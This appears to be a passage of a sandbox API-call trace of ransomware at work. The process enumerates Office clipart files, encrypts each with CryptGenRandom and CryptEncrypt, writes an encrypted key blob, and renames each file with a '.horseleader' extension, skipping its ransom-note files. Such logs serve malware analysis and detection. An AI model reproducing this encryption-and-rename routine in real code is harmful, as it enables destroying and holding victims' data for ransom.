WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xc48, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xc48, lpOverlapped=0x0) returned 1 [0252.970] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.970] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.970] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.971] CloseHandle (hObject=0x158) returned 1 [0252.971] GetProcessHeap () returned 0x780000 [0252.971] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.971] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.horseleader") returned 79 [0252.971] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf.horseleader")) returned 1 [0252.972] GetProcessHeap () returned 0x780000 [0252.972] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.972] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1df4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04206_.WMF", cAlternateFileName="")) returned 1 [0252.972] lstrcmpiW (lpString1="AN04206_.WMF", lpString2="Windows") returned -1 [0252.972] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 67 [0252.972] StrStrIW (lpFirst="AN04206_.WMF", lpSrch=".horseleader") returned 0x0 [0252.972] lstrcmpW (lpString1="AN04206_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.972] lstrcmpW (lpString1="AN04206_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.972] lstrlenW (lpString=".testttjffg") returned 11 [0252.972] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.972] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, 
pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.973] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.975] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 67 [0252.975] StrStrW (lpFirst="AN04206_.WMF", lpSrch=".txt") returned 0x0 [0252.975] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7668) returned 1 [0252.975] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1df4, lpOverlapped=0x0) returned 1 [0252.977] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe20c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.977] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1df4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1df4, lpOverlapped=0x0) returned 1 [0252.978] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.978] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.978] WriteFile (in: hFile=0x158, 
lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.978] CloseHandle (hObject=0x158) returned 1 [0252.978] GetProcessHeap () returned 0x780000 [0252.978] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.978] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.horseleader") returned 79 [0252.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf.horseleader")) returned 1 [0252.979] GetProcessHeap () returned 0x780000 [0252.979] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.979] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x212c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04225_.WMF", cAlternateFileName="")) returned 1 [0252.979] lstrcmpiW (lpString1="AN04225_.WMF", lpString2="Windows") returned -1 [0252.979] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 67 [0252.980] StrStrIW (lpFirst="AN04225_.WMF", 
lpSrch=".horseleader") returned 0x0 [0252.980] lstrcmpW (lpString1="AN04225_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.980] lstrcmpW (lpString1="AN04225_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.980] lstrlenW (lpString=".testttjffg") returned 11 [0252.980] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.980] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.980] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.980] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 67 [0252.980] StrStrW (lpFirst="AN04225_.WMF", lpSrch=".txt") returned 0x0 [0252.980] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=8492) returned 1 [0252.981] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x212c, lpOverlapped=0x0) returned 1 [0252.983] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffded4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.983] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x212c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x212c, 
lpOverlapped=0x0) returned 1 [0252.983] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.983] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.983] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.983] CloseHandle (hObject=0x158) returned 1 [0252.984] GetProcessHeap () returned 0x780000 [0252.984] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.984] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.horseleader") returned 79 [0252.984] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf.horseleader")) returned 1 [0252.985] GetProcessHeap () returned 0x780000 [0252.985] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.985] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, 
nFileSizeLow=0x1e7c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04235_.WMF", cAlternateFileName="")) returned 1 [0252.985] lstrcmpiW (lpString1="AN04235_.WMF", lpString2="Windows") returned -1 [0252.985] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 67 [0252.985] StrStrIW (lpFirst="AN04235_.WMF", lpSrch=".horseleader") returned 0x0 [0252.985] lstrcmpW (lpString1="AN04235_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.985] lstrcmpW (lpString1="AN04235_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.985] lstrlenW (lpString=".testttjffg") returned 11 [0252.985] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.985] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.985] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.985] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.986] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned 67 [0252.986] StrStrW (lpFirst="AN04235_.WMF", lpSrch=".txt") returned 0x0 [0252.986] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7804) returned 1 [0252.986] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesRead=0x32aedf4*=0x1e7c, lpOverlapped=0x0) returned 1 [0252.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe184, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.989] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1e7c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1e7c, lpOverlapped=0x0) returned 1 [0252.989] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.990] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.990] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.990] CloseHandle (hObject=0x158) returned 1 [0252.990] GetProcessHeap () returned 0x780000 [0252.990] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.990] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.horseleader") returned 79 [0252.990] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf.horseleader")) returned 1 [0252.991] GetProcessHeap () returned 0x780000 [0252.991] HeapFree (in: hHeap=0x780000, dwFlags=0x0, 
lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.991] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x513d5e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1e7c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04267_.WMF", cAlternateFileName="")) returned 1 [0252.992] lstrcmpiW (lpString1="AN04267_.WMF", lpString2="Windows") returned -1 [0252.992] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 67 [0252.992] StrStrIW (lpFirst="AN04267_.WMF", lpSrch=".horseleader") returned 0x0 [0252.992] lstrcmpW (lpString1="AN04267_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.992] lstrcmpW (lpString1="AN04267_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.992] lstrlenW (lpString=".testttjffg") returned 11 [0252.992] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.992] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.992] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.993] lstrlenW 
(lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 67 [0252.993] StrStrW (lpFirst="AN04267_.WMF", lpSrch=".txt") returned 0x0 [0252.993] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7804) returned 1 [0252.993] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1e7c, lpOverlapped=0x0) returned 1 [0252.995] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe184, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.995] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1e7c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1e7c, lpOverlapped=0x0) returned 1 [0252.996] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.996] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.996] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.996] CloseHandle (hObject=0x158) returned 1 [0252.996] GetProcessHeap () returned 0x780000 [0252.996] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.996] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.horseleader") returned 79 [0252.996] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04267_.wmf.horseleader")) returned 1 [0252.997] GetProcessHeap () returned 0x780000 [0252.997] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.997] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x513d5e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7e0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04269_.WMF", cAlternateFileName="")) returned 1 [0252.998] lstrcmpiW (lpString1="AN04269_.WMF", lpString2="Windows") returned -1 [0252.998] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 67 [0252.998] StrStrIW (lpFirst="AN04269_.WMF", lpSrch=".horseleader") returned 0x0 [0252.998] lstrcmpW (lpString1="AN04269_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.998] lstrcmpW (lpString1="AN04269_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.999] lstrlenW (lpString=".testttjffg") returned 11 [0252.999] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.999] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.999] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.999] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.999] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 67 [0252.999] StrStrW (lpFirst="AN04269_.WMF", lpSrch=".txt") returned 0x0 [0253.000] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2016) returned 1 [0253.000] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x7e0, lpOverlapped=0x0) returned 1 [0253.001] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff820, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.002] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x7e0, lpOverlapped=0x0) returned 1 [0253.002] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.002] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.002] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.002] CloseHandle 
(hObject=0x158) returned 1 [0253.002] GetProcessHeap () returned 0x780000 [0253.002] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.002] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.horseleader") returned 79 [0253.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04269_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04269_.wmf.horseleader")) returned 1 [0253.003] GetProcessHeap () returned 0x780000 [0253.003] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.003] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x9bc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04323_.WMF", cAlternateFileName="")) returned 1 [0253.003] lstrcmpiW (lpString1="AN04323_.WMF", lpString2="Windows") returned -1 [0253.003] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft 